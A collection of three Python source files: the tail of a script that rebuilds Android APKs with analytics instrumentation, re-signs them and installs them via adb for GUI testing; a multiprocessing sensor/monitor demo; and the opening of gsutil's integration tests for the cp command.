instrumentation.leanplum(app, testPath)
if analyticService == 'Crashlytics':
instrumentation.crashlytics(app, testPath)
if analyticService == 'Appsee':
instrumentation.appsee(app, testPath)
if analyticService == 'Applovin':
instrumentation.applovin(app, testPath)
if analyticService == 'Appsflyer':
instrumentation.appsflyer(app, testPath)
if analyticService == 'Firebase':
instrumentation.firebase(app, testPath)
if analyticService == 'Ironsource':
instrumentation.ironsource(app, testPath)
if analyticService == 'Flurry':
instrumentation.flurry(app, testPath)
if analyticService == 'GoogleAnalytics':
instrumentation.googleAnalytics(app, testPath)
if analyticService == 'Newrelic':
instrumentation.newrelic(app, testPath)
#rebuild
rm = "rm %s" %(testPath+app+'.apk')
os.system(rm)
rebuildCmd = "apktool b %s -o %s" % (testPath+app, testPath+app+'_1.apk')
os.system(rebuildCmd)
#Generate key for app
KeyGenCmd = "keytool -genkey -alias abc.keystore -keyalg RSA -validity 20000 -keystore %s%s"%(testPath, app+'.keystore')
print KeyGenCmd
child = pexpect.spawn(KeyGenCmd, logfile = sys.stdout)
#password
try:
if(child.expect([pexpect.TIMEOUT, 'password'])):
child.sendline('123456')
except:
print (str(child))
#re-enter password
try:
if (child.expect([pexpect.TIMEOUT, 'Re-enter'])):
child.sendline('123456')
except:
print (str(child))
# last name
try:
if (child.expect([pexpect.TIMEOUT, 'last'])):
child.sendline('zhang')
except:
print (str(child))
# unit
try:
if (child.expect([pexpect.TIMEOUT, 'unit'])):
child.sendline('utsa')
except:
print (str(child))
# organization
try:
if (child.expect([pexpect.TIMEOUT, 'organization'])):
child.sendline('utsa')
except:
print (str(child))
# city
try:
if (child.expect([pexpect.TIMEOUT, 'City'])):
child.sendline('SA')
except:
print (str(child))
# state
try:
if (child.expect([pexpect.TIMEOUT, 'State'])):
child.sendline('Tx')
except:
print (str(child))
# country code
try:
if (child.expect([pexpect.TIMEOUT, 'country code'])):
child.sendline('01')
except:
print (str(child))
# correct?
try:
if (child.expect([pexpect.TIMEOUT, 'correct'])):
child.sendline('y')
except:
print (str(child))
# RETURN
try:
if (child.expect([pexpect.TIMEOUT, 'RETURN'])):
child.sendline('\n')
except:
print (str(child))
try:
child.expect([pexpect.TIMEOUT, pexpect.EOF])
except:
print (str(child))
# sign the new apk file with the generated key
assignCmd = "jarsigner -verbose -keystore %s%s -storepass 123456 -signedjar %s%s %s%s abc.keystore" %(testPath, app+'.keystore',testPath,app+'.apk', testPath, app+'_1.apk')
print assignCmd
child = pexpect.spawn(assignCmd, logfile = sys.stdout)
#password
try:
if(child.expect([pexpect.TIMEOUT, 'password'])):
child.sendline('123456')
except:
print (str(child))
try:
child.expect([pexpect.TIMEOUT, pexpect.EOF])
except:
print (str(child))
### install the app and run the GUI test; make sure your mobile device is connected to the computer
cmd_install = 'adb install ' + testPath + app + '.apk'
print cmd_install
os.system(cmd_install)
cmd_logcat_c = 'adb logcat -c'
print cmd_logcat_c
os.system(cmd_logcat_c)
cmd_logcat_out = 'adb logcat > ' + testPath + app +'.log'
print cmd_logcat_out
print 'please perform UI test............'
p = Process(target=Monkey.getUserInput, args=(app, testPath))
p.start()
os.system(cmd_logcat_out)
|
multi_sensors.py
|
#!/usr/bin/env python
#
# Copyright AlertAvert.com (c) 2013. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Demonstrates the use of multi-processing for infinite streams of data.
Many producers (``Sensor`` objects) will generate an infinite stream of data that will be
queued for a single consumer to analyze and take action on.
"""
from __future__ import print_function
__author__ = 'marco'
import argparse
import multiprocessing as mp
import os
import time
from sensors import Sensor
# FIXME: Globals are evil, avoid in real production code
pid_file = '/tmp/multi_sensors.pid'
pid_file_lock = mp.Lock()
console_lock = mp.Lock()
def log(msg):
with console_lock:
print(msg)
def producer(queue, delay=0.500):
    """ Forever puts the sensor's readings onto the queue.
    :param queue: the queue to push sensor data to
    :param delay: pause, in seconds, between successive readings
:return: None
"""
with pid_file_lock:
with open(pid_file, mode='a') as pid:
pid.write('{}\n'.format(os.getpid()))
log("[{}] producer started".format(os.getpid()))
sensor = Sensor(faulty_pct=30.0)
try:
for value in sensor.get():
queue.put(value)
time.sleep(delay)
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
def consumer(queue, idx, threshold=5, shared=None):
""" Reads values from the queue and raises an alarm
    More than ``threshold`` consecutive True readings will trigger an alarm.
    :param queue: the queue to read from
    :param idx: index of this monitor, used only in log messages
    :param threshold: the threshold at which we trigger the alarm, across ALL monitors
    :param shared: an optional shared ``Value`` for multiple Monitors
    :type shared: multiprocessing.Value
    :return: never, unless the threshold is exceeded
"""
log("[monitor: {}] Started with threshold {}".format(os.getpid(), threshold))
count = 0
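    # `count` tracks consecutive positive readings seen by this monitor; the shared
    # Value (updated under its lock below) accumulates counts across all monitors,
    # so the threshold is effectively applied globally.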
try:
while shared.value < threshold:
reading = queue.get(block=True)
if reading:
count += 1
log('Alerting: {}'.format(count))
else:
# reset the counter
count = 0
if shared is not None:
with shared.get_lock():
                    # NOTE: double-check here, since things may have changed between the
                    # test in the while condition and this point; skipping this check
                    # causes some monitors to never terminate.
if count == 0 and shared.value < threshold:
shared.value = 0
else:
shared.value += count
log("[monitor-{}] Threshold exceeded - exiting".format(idx))
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
def main(conf):
# FIXME: poor man's MP pool - use multiprocessing.Pool in real production code
sensors_pool = []
monitors_pool = []
queue = mp.Queue()
# Shared memory, to share state between processes - this is best left to the experts!
shared_value = mp.Value('i', 0)
for k in range(conf.monitors):
monitor = mp.Process(target=consumer, name="Monitor",
args=(queue, k, conf.threshold, shared_value))
monitors_pool.append(monitor)
monitor.start()
for i in range(conf.sensors):
proc_name = 'Proc-{}'.format(i)
process = mp.Process(target=producer, name=proc_name, args=(queue,))
process.start()
sensors_pool.append(process)
log("[main: {}] waiting for {} monitors to complete (when threshold is exceeded)"
.format(os.getpid(), conf.monitors))
try:
for monitor in monitors_pool:
monitor.join()
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
for process in sensors_pool:
process.terminate()
with pid_file_lock:
os.remove(pid_file)
log("[main: {}] finished".format(os.getpid()))
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--sensors', type=int, default=10,
help="Number of sensors to activate")
parser.add_argument('--threshold', required=False, default=2, type=int,
help="Alarm threshold")
parser.add_argument('--monitors', type=int, default=1,
help="Number of monitoring processes")
return parser.parse_args()
if __name__ == "__main__":
config = parse_args()
main(config)
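# Example invocation (illustrative; flag names match parse_args() above):
#   python multi_sensors.py --sensors 5 --monitors 2 --threshold 3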
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib import exception
from gslib import name_expansion
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.exception import InvalidUrlError
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.hashing_helper import GetMd5
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
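# The helper functions below exercise cp/mv with the -P (preserve POSIX attributes)
# flag in both directions; they are shared between the cp and mv test suites.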
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
  # The test_name loop variable below can be used to help debug the test if
  # there is a problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
cls.assertEquals(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
cls.assertEquals(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
    # Move objects one at a time to avoid relying on bucket listing consistency.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
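# FIFO helpers: opening a named pipe blocks until both a reader and a writer are
# attached, so the tests below always run these on background threads.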
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
